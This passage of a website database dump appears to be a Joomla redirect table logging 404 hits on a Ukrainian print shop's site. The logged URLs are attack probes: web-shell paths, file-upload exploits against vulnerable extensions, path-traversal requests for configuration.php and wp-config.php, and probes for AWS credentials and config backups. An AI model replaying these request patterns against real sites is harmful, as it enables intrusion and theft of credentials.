00:00:00',301),(15938,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/.h..php',NULL,'http://site.ru','',1,0,'2020-01-17 01:32:20','0000-00-00 00:00:00',301),(15939,'https://ekvatorprint.com.ua/ghjk.php',NULL,'http://site.ru','',5,0,'2020-01-17 02:29:08','0000-00-00 00:00:00',301),(15940,'https://ekvatorprint.com.ua/wp-admin/network/sitenets.php5',NULL,'http://site.ru','',2,0,'2020-01-17 04:23:08','0000-00-00 00:00:00',301),(15941,'https://ekvatorprint.com.ua/modules/mod_insider/mod_insider.php',NULL,'http://site.ru','',4,0,'2020-01-17 07:01:24','0000-00-00 00:00:00',301),(15942,'https://ekvatorprint.com.ua/modules/mod_carramba/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-17 07:22:49','0000-00-00 00:00:00',301),(15943,'https://ekvatorprint.com.ua/ehpgn3eqeep2xtykilrapdr8ctro',NULL,'','',1,0,'2020-01-17 08:04:25','0000-00-00 00:00:00',301),(15944,'https://ekvatorprint.com.ua/layouts/libraries/cms/bag.php',NULL,'http://site.ru','',1,0,'2020-01-17 13:32:38','0000-00-00 00:00:00',301),(15945,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/mysql/gank.php.php',NULL,'http://site.ru','',1,0,'2020-01-17 13:34:13','0000-00-00 00:00:00',301),(15946,'https://ekvatorprint.com.ua/templates/beez3/html/com_contact/categories/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-17 13:56:28','0000-00-00 00:00:00',301),(15947,'https://ekvatorprint.com.ua/administrator/components/com_categories/views/category/.h..php',NULL,'http://site.ru','',1,0,'2020-01-17 14:01:00','0000-00-00 00:00:00',301),(15948,'https://ekvatorprint.com.ua/plugins/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-01-17 14:52:19','0000-00-00 00:00:00',301),(15949,'https://ekvatorprint.com.ua/orvxshell_v2.php',NULL,'http://site.ru','',1,0,'2020-01-17 14:56:57','0000-00-00 00:00:00',301),(15950,'https://ekvatorprint.com.ua/administrator/components/com_categories/models/forms/.h..php',NULL,'http://site.ru','',1,0,'2020-01-17 15:24:30','0000-00-00 00:00:00',301),(15951,'https://ekvatorprint.com.ua/media/jui/img/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-17 15:28:14','0000-00-00 00:00:00',301),(15952,'https://ekvatorprint.com.ua/layouts/libraries/cms/html/bootstrap/5e1ca298e5bd9.php',NULL,'http://site.ru','',1,0,'2020-01-17 15:52:04','0000-00-00 00:00:00',301),(15953,'https://ekvatorprint.com.ua/layouts/libraries/cms/html/bootstrap/.h..php',NULL,'http://site.ru','',2,0,'2020-01-17 15:52:28','0000-00-00 00:00:00',301),(15954,'https://ekvatorprint.com.ua/templates/beez3/html/mod_login/gank.php.php',NULL,'http://site.ru','',4,0,'2020-01-17 16:48:04','0000-00-00 00:00:00',301),(15955,'https://ekvatorprint.com.ua/modules/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-17 16:49:24','0000-00-00 00:00:00',301),(15956,'https://ekvatorprint.com.ua/administrator/components/com_languages/views/language/simpleside.php5',NULL,'http://site.ru','',2,0,'2020-01-17 17:13:55','0000-00-00 00:00:00',301),(15957,'https://ekvatorprint.com.ua/administrator/components/com_categories/tables/5e1ca29092db6.php',NULL,'http://site.ru','',1,0,'2020-01-17 17:13:57','0000-00-00 00:00:00',301),(15958,'https://ekvatorprint.com.ua/layouts/joomla/form/streamed.php',NULL,'http://site.ru','',1,0,'2020-01-17 17:17:30','0000-00-00 00:00:00',301),(15959,'https://ekvatorprint.com.ua/administrator/components/com_languages/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-17 18:46:29','0000-00-00 00:00:00',301),(15960,'https://ekvatorprint.com.ua/administrator/templates/hathor/html/com_templates/style/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-01-17 20:28:23','0000-00-00 00:00:00',301),(15961,'https://ekvatorprint.com.ua/administrator/modules/mod_logged/.h..php',NULL,'http://site.ru','',1,0,'2020-01-17 20:33:46','0000-00-00 00:00:00',301),(15962,'https://ekvatorprint.com.ua/templates/delcon/js/.h..php',NULL,'http://site.ru','',2,0,'2020-01-17 21:22:37','0000-00-00 00:00:00',301),(15963,'https://ekvatorprint.com.ua/layouts/joomla/searchtools/grid/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-17 21:23:35','0000-00-00 00:00:00',301),(15964,'https://ekvatorprint.com.ua/templates/system/images/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-17 21:51:57','0000-00-00 00:00:00',301),(15965,'https://ekvatorprint.com.ua/layouts/joomla/searchtools/bag.php',NULL,'http://site.ru','',1,0,'2020-01-17 21:52:54','0000-00-00 00:00:00',301),(15966,'https://ekvatorprint.com.ua/language/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-17 21:58:18','0000-00-00 00:00:00',301),(15967,'https://ekvatorprint.com.ua/administrator/components/wp-side.php',NULL,'http://site.ru','',2,0,'2020-01-17 22:25:51','0000-00-00 00:00:00',301),(15968,'https://ekvatorprint.com.ua/layouts/joomla/streamed.php',NULL,'http://site.ru','',1,0,'2020-01-17 22:54:44','0000-00-00 00:00:00',301),(15969,'https://ekvatorprint.com.ua/administrator/components/com_languages/bag.php',NULL,'http://site.ru','',2,0,'2020-01-18 00:06:16','0000-00-00 00:00:00',301),(15970,'https://ekvatorprint.com.ua/wp-admin/87/5.php',NULL,'http://site.ru','',1,0,'2020-01-18 00:40:34','0000-00-00 00:00:00',301),(15971,'https://ekvatorprint.com.ua/templates/beez3/html/com_newsfeeds/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-18 01:30:01','0000-00-00 00:00:00',301),(15972,'https://ekvatorprint.com.ua/templates/beez3/html/com_content/archive/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-18 01:53:49','0000-00-00 00:00:00',301),(15973,'https://ekvatorprint.com.ua/wp-admin/87/mini.php',NULL,'http://site.ru','',1,0,'2020-01-18 06:58:33','0000-00-00 00:00:00',301),(15974,'https://ekvatorprint.com.ua/administrator/components/com_categories/views/categories/tmpl/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-18 08:07:15','0000-00-00 00:00:00',301),(15975,'https://ekvatorprint.com.ua/includes/.h..php',NULL,'http://site.ru','',2,0,'2020-01-18 08:12:35','0000-00-00 00:00:00',301),(15976,'https://ekvatorprint.com.ua/images/banners/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-01-18 08:21:15','0000-00-00 00:00:00',301),(15977,'https://ekvatorprint.com.ua/layouts/plugins/user/profile/fields/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-18 09:52:06','0000-00-00 00:00:00',301),(15978,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/wp-console.php',NULL,'http://site.ru','',2,0,'2020-01-18 10:23:33','0000-00-00 00:00:00',301),(15979,'https://ekvatorprint.com.ua/layouts/joomla/links/simpleside.php5',NULL,'http://site.ru','',2,0,'2020-01-18 10:46:38','0000-00-00 00:00:00',301),(15980,'https://ekvatorprint.com.ua/administrator/components/com_categories/helpers/html/5e1779bfba97b.php',NULL,'http://site.ru','',1,0,'2020-01-18 12:33:07','0000-00-00 00:00:00',301),(15981,'https://ekvatorprint.com.ua/templates/beez3/html/layouts/joomla/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-18 12:41:31','0000-00-00 00:00:00',301),(15982,'https://ekvatorprint.com.ua/lux.php',NULL,'http://site.ru','',6,0,'2020-01-18 13:25:59','0000-00-00 00:00:00',301),(15983,'https://ekvatorprint.com.ua/administrator/components/com_admin/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-18 13:54:29','0000-00-00 00:00:00',301),(15984,'https://ekvatorprint.com.ua/c.php5',NULL,'http://site.ru','',1,0,'2020-01-18 14:15:23','0000-00-00 00:00:00',301),(15985,'https://ekvatorprint.com.ua/layouts/joomla/sidebars/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-18 14:38:56','0000-00-00 00:00:00',301),(15986,'https://ekvatorprint.com.ua/administrator/components/com_banners/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-18 15:11:08','0000-00-00 00:00:00',301),(15987,'https://ekvatorprint.com.ua/modules/mod_stats/tmpl/beautifu.php',NULL,'http://site.ru','',3,0,'2020-01-18 15:39:28','0000-00-00 00:00:00',301),(15988,'https://ekvatorprint.com.ua/media/k2/videos/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-18 15:59:51','0000-00-00 00:00:00',301),(15989,'https://ekvatorprint.com.ua/images/.h..php',NULL,'http://site.ru','',2,0,'2020-01-18 18:13:56','0000-00-00 00:00:00',301),(15990,'https://ekvatorprint.com.ua/layouts/joomla/edit/5e1ca285b54f4.php',NULL,'http://site.ru','',3,0,'2020-01-18 19:47:14','0000-00-00 00:00:00',301),(15991,'https://ekvatorprint.com.ua/layouts/joomla/searchtools/default/wp-side.php',NULL,'http://site.ru','',2,0,'2020-01-18 19:58:48','0000-00-00 00:00:00',301),(15992,'https://ekvatorprint.com.ua/layouts/joomla/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-18 20:13:59','0000-00-00 00:00:00',301),(15993,'https://ekvatorprint.com.ua/layouts/joomla/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-18 20:13:59','0000-00-00 00:00:00',301),(15994,'https://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/bag.php',NULL,'http://site.ru','',1,0,'2020-01-18 22:31:34','0000-00-00 00:00:00',301),(15995,'https://ekvatorprint.com.ua/modules/.h..php',NULL,'http://site.ru','',2,0,'2020-01-19 00:06:34','0000-00-00 00:00:00',301),(15996,'https://ekvatorprint.com.ua/templates/beez3/html/com_weblinks/.h..php',NULL,'http://site.ru','',1,0,'2020-01-19 00:33:41','0000-00-00 00:00:00',301),(15997,'https://ekvatorprint.com.ua/administrator/components/com_categories/helpers/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-19 03:20:36','0000-00-00 00:00:00',301),(15998,'https://ekvatorprint.com.ua/administrator/adminer.php',NULL,'','',1,0,'2020-01-20 09:18:23','0000-00-00 00:00:00',301),(15999,'https://ekvatorprint.com.ua/templates/beez3/html/com_content/featured/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-20 18:21:53','0000-00-00 00:00:00',301),(16000,'https://ekvatorprint.com.ua/administrator/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-20 18:48:04','0000-00-00 00:00:00',301),(16001,'https://ekvatorprint.com.ua/images/shell.php',NULL,'http://site.ru','',5,0,'2020-01-20 20:11:24','0000-00-00 00:00:00',301),(16002,'https://ekvatorprint.com.ua/or.php',NULL,'http://site.ru','',1,0,'2020-01-20 20:12:59','0000-00-00 00:00:00',301),(16003,'https://ekvatorprint.com.ua/neter.php',NULL,'http://site.ru','',3,0,'2020-01-20 20:18:50','0000-00-00 00:00:00',301),(16004,'https://ekvatorprint.com.ua/mode.php',NULL,'http://site.ru','',3,0,'2020-01-20 21:05:50','0000-00-00 00:00:00',301),(16005,'https://ekvatorprint.com.ua/o.php',NULL,'http://site.ru','',19,0,'2020-01-20 22:56:29','0000-00-00 00:00:00',301),(16006,'https://ekvatorprint.com.ua/administrator/gank.php.php',NULL,'http://site.ru','',5,0,'2020-01-21 00:46:40','0000-00-00 00:00:00',301),(16007,'https://ekvatorprint.com.ua/wp-admini.php',NULL,'http://site.ru','',1,0,'2020-01-21 00:46:46','0000-00-00 00:00:00',301),(16008,'https://ekvatorprint.com.ua/wp-logs.php',NULL,'http://site.ru','',12,0,'2020-01-21 01:22:47','0000-00-00 00:00:00',301),(16009,'http://ekvatorprint.com.ua/js/admin.js',NULL,'','',1,0,'2020-01-21 15:07:16','0000-00-00 00:00:00',301),(16010,'https://ekvatorprint.com.ua/composer.json',NULL,'','',3,0,'2020-01-21 15:08:19','0000-00-00 00:00:00',301),(16011,'https://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php',NULL,'','',19,0,'2020-01-22 15:54:14','0000-00-00 00:00:00',301),(16012,'https://ekvatorprint.com.ua/components/com_b2jcontact/vuln.php',NULL,'','',18,0,'2020-01-22 15:54:15','0000-00-00 00:00:00',301),(16013,'https://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',11,0,'2020-01-22 15:54:16','0000-00-00 00:00:00',301),(16014,'https://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/up.php',NULL,'','',11,0,'2020-01-22 15:54:17','0000-00-00 00:00:00',301),(16015,'https://ekvatorprint.com.ua/index.php?option=com_jwallpapers&task=upload',NULL,'','',23,0,'2020-01-22 15:54:28','0000-00-00 00:00:00',301),(16016,'https://ekvatorprint.com.ua/jwallpapers_files/plupload/up.php',NULL,'','',21,0,'2020-01-22 15:54:28','0000-00-00 00:00:00',301),(16017,'https://ekvatorprint.com.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',24,0,'2020-01-22 15:54:29','0000-00-00 00:00:00',301),(16018,'https://ekvatorprint.com.ua/tmp/up.php',NULL,'','',19,0,'2020-01-22 15:54:30','0000-00-00 00:00:00',301),(16019,'https://ekvatorprint.com.ua/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',11,0,'2020-01-22 15:54:31','0000-00-00 00:00:00',301),(16020,'https://ekvatorprint.com.ua/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php',NULL,'','',11,0,'2020-01-22 15:54:32','0000-00-00 00:00:00',301),(16021,'https://ekvatorprint.com.ua/tmp/vuln.php.xxxjpg',NULL,'','',19,0,'2020-01-22 15:54:33','0000-00-00 00:00:00',301),(16022,'https://ekvatorprint.com.ua/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',17,0,'2020-01-22 15:54:34','0000-00-00 00:00:00',301),(16023,'https://ekvatorprint.com.ua/modules/megamenu/uploadify/up.php',NULL,'','',17,0,'2020-01-22 15:54:35','0000-00-00 00:00:00',301),(16024,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',16,0,'2020-01-22 15:54:37','0000-00-00 00:00:00',301),(16025,'https://ekvatorprint.com.ua/cache/accesson.php',NULL,'','',7,0,'2020-01-23 02:45:21','0000-00-00 00:00:00',301),(16026,'https://ekvatorprint.com.ua/avtogear63_ru_cron.php',NULL,'','',3,0,'2020-01-23 16:00:20','0000-00-00 00:00:00',301),(16027,'https://ekvatorprint.com.ua/administrator/includes/toolbar.php',NULL,'','',1,0,'2020-01-24 09:28:34','0000-00-00 00:00:00',301),(16028,'https://ekvatorprint.com.ua/administrator/components/com_admin/postinstall/phpversion.php',NULL,'','',1,0,'2020-01-24 20:51:48','0000-00-00 00:00:00',301),(16029,'https://ekvatorprint.com.ua/pywjatosmotio',NULL,'','',1,0,'2020-01-25 02:28:20','0000-00-00 00:00:00',301),(16030,'https://ekvatorprint.com.ua/cache/cu.php?qesnbunczligyuaitluohzkxfcamtluzimxqakqrrigpalolka=die(md5(435345));',NULL,'ekvatorprint.com.ua','',2,0,'2020-01-27 07:39:57','0000-00-00 00:00:00',301),(16031,'https://ekvatorprint.com.ua/logs/cu.php?qesnbunczligyuaitluohzkxfcamtluzimxqakqrrigpalolka=die(md5(435345));',NULL,'ekvatorprint.com.ua','',2,0,'2020-01-27 07:40:34','0000-00-00 00:00:00',301),(16032,'https://ekvatorprint.com.ua/tmp/cu.php?qesnbunczligyuaitluohzkxfcamtluzimxqakqrrigpalolka=die(md5(435345));',NULL,'ekvatorprint.com.ua','',2,0,'2020-01-27 07:40:40','0000-00-00 00:00:00',301),(16033,'http://ekvatorprint.com.ua/database/print.css',NULL,'','',2,0,'2020-01-27 22:07:47','0000-00-00 00:00:00',301),(16034,'http://ekvatorprint.com.ua/pma/print.css',NULL,'','',2,0,'2020-01-27 22:07:48','0000-00-00 00:00:00',301),(16035,'http://ekvatorprint.com.ua/phpmyadmin/print.css',NULL,'','',4,0,'2020-01-27 22:07:48','0000-00-00 00:00:00',301),(16036,'http://ekvatorprint.com.ua/myadmin/print.css',NULL,'','',2,0,'2020-01-27 22:07:48','0000-00-00 00:00:00',301),(16037,'http://ekvatorprint.com.ua/mysql/print.css',NULL,'','',2,0,'2020-01-27 22:07:49','0000-00-00 00:00:00',301),(16038,'https://ekvatorprint.com.ua/press/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:11','0000-00-00 00:00:00',301),(16039,'https://ekvatorprint.com.ua/wpmu/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:11','0000-00-00 00:00:00',301),(16040,'https://ekvatorprint.com.ua/sites/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16041,'https://ekvatorprint.com.ua/sitio/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16042,'https://ekvatorprint.com.ua/old/wp-login.php',NULL,'','',9,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16043,'https://ekvatorprint.com.ua/info/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16044,'https://ekvatorprint.com.ua/demo/wp-login.php',NULL,'','',8,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16045,'https://ekvatorprint.com.ua/portal/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16046,'https://ekvatorprint.com.ua/english/wp-login.php',NULL,'','',5,0,'2020-01-29 02:55:12','0000-00-00 00:00:00',301),(16047,'http://ekvatorprint.com.ua/fonts/fontawesome-webfont.woff2?v=4.3.0',NULL,'https://ekvatorprint.com.ua/print-flags','',3,0,'2020-01-30 13:23:55','0000-00-00 00:00:00',301),(16048,'http://ekvatorprint.com.ua/fonts/fontawesome-webfont.woff?v=4.3.0',NULL,'https://ekvatorprint.com.ua/print-flags','',3,0,'2020-01-30 13:23:55','0000-00-00 00:00:00',301),(16049,'http://ekvatorprint.com.ua/fonts/fontawesome-webfont.ttf?v=4.3.0',NULL,'https://ekvatorprint.com.ua/print-flags','',3,0,'2020-01-30 13:23:55','0000-00-00 00:00:00',301),(16050,'https://ekvatorprint.com.ua/assets/images/pas.php',NULL,'','',3,0,'2020-01-30 22:39:02','0000-00-00 00:00:00',301),(16051,'https://ekvatorprint.com.ua/wp-config.php',NULL,'','',9,0,'2020-02-01 13:25:06','0000-00-00 00:00:00',301),(16052,'https://ekvatorprint.com.ua/.aws/credentials',NULL,'','',57,0,'2020-02-01 14:45:06','0000-00-00 00:00:00',301),(16053,'https://ekvatorprint.com.ua/images/xxu.php',NULL,'','',2,0,'2020-02-01 16:19:44','0000-00-00 00:00:00',301),(16054,'https://ekvatorprint.com.ua/wp1/wp-login.php',NULL,'http://ekvatorprint.com.ua//wp1/wp-login.php','',2,0,'2020-02-01 16:21:13','0000-00-00 00:00:00',301),(16055,'https://ekvatorprint.com.ua/wp2/wp-login.php',NULL,'http://ekvatorprint.com.ua//wp2/wp-login.php','',1,0,'2020-02-01 18:34:27','0000-00-00 00:00:00',301),(16056,'https://ekvatorprint.com.ua/2020/wp-login.php',NULL,'http://ekvatorprint.com.ua//2020/wp-login.php','',5,0,'2020-02-01 20:44:31','0000-00-00 00:00:00',301),(16057,'https://ekvatorprint.com.ua/component/kide/',NULL,'','',1,0,'2020-02-01 21:45:45','0000-00-00 00:00:00',301),(16058,'https://ekvatorprint.com.ua/beutjpt30zncusu7ytzqi8mpmcx',NULL,'','',1,0,'2020-02-02 02:42:22','0000-00-00 00:00:00',301),(16059,'https://ekvatorprint.com.ua/index.php/component/k2/item/1',NULL,'','',5,0,'2020-02-02 17:41:35','0000-00-00 00:00:00',301),(16060,'https://ekvatorprint.com.ua/ckfinder/ckfinder.html',NULL,'','',4,0,'2020-02-03 09:23:42','0000-00-00 00:00:00',301),(16061,'https://ekvatorprint.com.ua/avtogear86_ru_cron.php',NULL,'','',3,0,'2020-02-06 01:25:21','0000-00-00 00:00:00',301),(16062,'https://ekvatorprint.com.ua/bomsukzssaopqrrcazeqkoyhnlgxlkegrqtkkeswghrcmttlxg',NULL,'','',1,0,'2020-02-06 18:00:07','0000-00-00 00:00:00',301),(16063,'https://ekvatorprint.com.ua/xxxxxx.php',NULL,'','',1,0,'2020-02-09 20:41:12','0000-00-00 00:00:00',301),(16064,'https://ekvatorprint.com.ua/tinyfilemanager.php',NULL,'','',2,0,'2020-02-10 07:46:28','0000-00-00 00:00:00',301),(16065,'https://ekvatorprint.com.ua/ price',NULL,'','',1,0,'2020-02-11 07:49:56','0000-00-00 00:00:00',301),(16066,'https://ekvatorprint.com.ua/nttfguchwaez2mycnqmus1lfn8mx',NULL,'','',1,0,'2020-02-11 10:06:22','0000-00-00 00:00:00',301),(16067,'https://ekvatorprint.com.ua/tinyfilemanager-master/tinyfilemanager.php',NULL,'','',1,0,'2020-02-11 11:26:32','0000-00-00 00:00:00',301),(16068,'https://ekvatorprint.com.ua/index.php?option=com_user&view=register',NULL,'http://ekvatorprint.com.ua/index.php?option=com_user&view=register','',28,0,'2020-02-11 19:37:48','0000-00-00 00:00:00',301),(16069,'https://ekvatorprint.com.ua/pas.php',NULL,'','',3,0,'2020-02-12 21:47:03','0000-00-00 00:00:00',301),(16070,'https://ekvatorprint.com.ua/jss.php',NULL,'','',3,0,'2020-02-16 04:24:11','0000-00-00 00:00:00',301),(16071,'http://ekvatorprint.com.ua/components/com_jssupportticket/include/css/jssupportticketdefault.css',NULL,'','',2,0,'2020-02-16 12:37:56','0000-00-00 00:00:00',301),(16072,'https://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/vuln.php',NULL,'','',10,0,'2020-02-16 22:16:46','0000-00-00 00:00:00',301),(16073,'https://ekvatorprint.com.ua/stats.php',NULL,'','',7,0,'2020-02-17 14:44:49','0000-00-00 00:00:00',301),(16074,'https://ekvatorprint.com.ua/avtogear_ru_cron_k.php',NULL,'','',3,0,'2020-02-17 22:12:45','0000-00-00 00:00:00',301),(16075,'https://ekvatorprint.com.ua/index.php?option=com_download-monitor&file=configuration.php',NULL,'','',4,0,'2020-02-18 15:39:27','0000-00-00 00:00:00',301),(16076,'https://ekvatorprint.com.ua/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',8,0,'2020-02-18 15:39:34','0000-00-00 00:00:00',301),(16077,'https://ekvatorprint.com.ua/index.php?option=com_addproperty&task=listing&propertyid=73&action=filedownload&fname=../configuration.php',NULL,'','',4,0,'2020-02-18 15:39:42','0000-00-00 00:00:00',301),(16078,'https://ekvatorprint.com.ua/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes',NULL,'','',1,0,'2020-02-18 15:39:50','0000-00-00 00:00:00',301),(16079,'https://ekvatorprint.com.ua/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php',NULL,'','',6,0,'2020-02-18 15:39:56','0000-00-00 00:00:00',301),(16080,'https://ekvatorprint.com.ua/index.php?option=com_jetext&task=download&file=../../configuration.php',NULL,'','',4,0,'2020-02-18 15:40:15','0000-00-00 00:00:00',301),(16081,'https://ekvatorprint.com.ua/index.php?option=com_facegallery&task=imagedownload&img_name=../../configuration.php',NULL,'','',6,0,'2020-02-18 15:40:25','0000-00-00 00:00:00',301),(16082,'https://ekvatorprint.com.ua/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php',NULL,'','',4,0,'2020-02-18 15:40:42','0000-00-00 00:00:00',301),(16083,'https://ekvatorprint.com.ua/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&itemid=1',NULL,'','',4,0,'2020-02-18 15:40:50','0000-00-00 00:00:00',301),(16084,'https://ekvatorprint.com.ua/index.php?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&itemid=0',NULL,'','',4,0,'2020-02-18 15:41:10','0000-00-00 00:00:00',301),(16085,'https://ekvatorprint.com.ua/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php',NULL,'','',4,0,'2020-02-18 15:41:29','0000-00-00 00:00:00',301),(16086,'https://ekvatorprint.com.ua/components/com_docman/dl2.php?archive=0&file=li4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',4,0,'2020-02-18 15:41:42','0000-00-00 00:00:00',301),(16087,'https://ekvatorprint.com.ua/modules/mod_dvfoldercontent/download.php?f=li4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',4,0,'2020-02-18 15:41:53','0000-00-00 00:00:00',301),(16088,'https://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'ekvatorprint.com.ua','',20,0,'2020-02-18 17:04:57','0000-00-00 00:00:00',301),(16089,'https://ekvatorprint.com.ua/wp-config.bak',NULL,'ekvatorprint.com.ua','',10,0,'2020-02-18 17:05:55','0000-00-00 00:00:00',301),(16090,'https://ekvatorprint.com.ua/wp-config.php.new',NULL,'ekvatorprint.com.ua','',10,0,'2020-02-18 17:06:08','0000-00-00 00:00:00',301),(16091,'https://ekvatorprint.com.ua/wp-config.php.old',NULL,'ekvatorprint.com.ua','',13,0,'2020-02-18 17:06:11','0000-00-00 00:00:00',301),(16092,'https://ekvatorprint.com.ua/wp-config.php.bak',NULL,'ekvatorprint.com.ua','',13,0,'2020-02-18 17:06:14','0000-00-00 00:00:00',301),(16093,'https://ekvatorprint.com.ua/wp-config.php.save',NULL,'ekvatorprint.com.ua','',11,0,'2020-02-18 17:06:22','0000-00-00 00:00:00',301),(16094,'https://ekvatorprint.com.ua/wp-config.php~',NULL,'ekvatorprint.com.ua','',16,0,'2020-02-18 17:06:26','0000-00-00 00:00:00',301),(16095,'https://ekvatorprint.com.ua/wp-config.php_',NULL,'ekvatorprint.com.ua','',9,0,'2020-02-18 17:06:30','0000-00-00 00:00:00',301),(16096,'https://ekvatorprint.com.ua/wp-config.php.orig',NULL,'ekvatorprint.com.ua','',8,0,'2020-02-18 17:06:38','0000-00-00 00:00:00',301),(16097,'https://ekvatorprint.com.ua/printing-in-zaporozhje\'a=0',NULL,'http://ekvatorprint.com.ua/printing-in-zaporozhje\'A=0','',1,0,'2020-02-20 00:15:10','0000-00-00 00:00:00',301),(16098,'https://ekvatorprint.com.ua/wp-json/wp/v2/users',NULL,'https://ekvatorprint.com.ua/wp-json/wp/v2/users','',8,0,'2020-02-20 08:24:30','0000-00-00 00:00:00',301),(16099,'https://ekvatorprint.com.ua/0160cc86e598b44cc767f411c8d4cfb7',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2020-02-20 15:58:16','0000-00-00 00:00:00',301),(16100,'https://ekvatorprint.com.ua/ucmr8e8iay',NULL,'','',1,0,'2020-02-21 20:02:34','0000-00-00 00:00:00',301),(16101,'https://ekvatorprint.com.ua/pmg0ho7bybjjql3',NULL,'','',1,0,'2020-02-22 19:07:16','0000-00-00 00:00:00',301),(16102,'https://ekvatorprint.com.ua/configuration.php_old',NULL,'','',2,0,'2020-02-24 02:32:31','0000-00-00 00:00:00',301),(16103,'https://ekvatorprint.com.ua/configuration.php.new',NULL,'','',1,0,'2020-02-24 02:32:33','0000-00-00 00:00:00',301),(16104,'https://ekvatorprint.com.ua/configuration.php.old',NULL,'','',2,0,'2020-02-24 02:32:34','0000-00-00 00:00:00',301),(16105,'https://ekvatorprint.com.ua/configuration.php_new',NULL,'','',1,0,'2020-02-24 02:32:35','0000-00-00 00:00:00',301),(16106,'https://ekvatorprint.com.ua/configuration.bak',NULL,'','',4,0,'2020-02-24 02:32:37','0000-00-00 00:00:00',301),(16107,'https://ekvatorprint.com.ua/configuration.php_bak',NULL,'','',1,0,'2020-02-24 02:32:39','0000-00-00 00:00:00',301),(16108,'https://ekvatorprint.com.ua/configuration.php-bak',NULL,'','',1,0,'2020-02-24 02:32:40','0000-00-00 00:00:00',301),(16109,'https://ekvatorprint.com.ua/home.bak.php',NULL,'','',3,0,'2020-02-24 19:47:05','0000-00-00 00:00:00',301),(16110,'http://ekvatorprint.com.ua/blog/license.txt',NULL,'http://ekvatorprint.com.ua/blog/license.txt','',2,0,'2020-02-26 07:20:11','0000-00-00 00:00:00',301),(16111,'https://ekvatorprint.com.ua/component/user/?task=register',NULL,'','',1,0,'2020-02-26 16:53:32','0000-00-00 00:00:00',301),(16112,'http://ekvatorprint.com.ua/wp/license.txt',NULL,'http://ekvatorprint.com.ua/wp/license.txt','',3,0,'2020-02-26 23:37:37','0000-00-00 00:00:00',301),(16113,'http://ekvatorprint.com.ua/info/license.txt',NULL,'http://ekvatorprint.com.ua/info/license.txt','',2,0,'2020-02-28 09:39:55','0000-00-00 00:00:00',301),(16114,'https://ekvatorprint.com.ua/components/com_initializer/build.php',NULL,'','',1,0,'2020-02-29 18:46:47','0000-00-00 00:00:00',301),(16115,'https://ekvatorprint.com.ua/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2020-02-29 22:50:55','0000-00-00 00:00:00',301),(16116,'https://ekvatorprint.com.ua/wp-links-opml.php',NULL,'http://www.google.com/','',10,0,'2020-03-01 12:04:08','0000-00-00 00:00:00',301),(16117,'http://ekvatorprint.com.ua/test/license.txt',NULL,'http://ekvatorprint.com.ua/test/license.txt','',4,0,'2020-03-02 23:03:32','0000-00-00 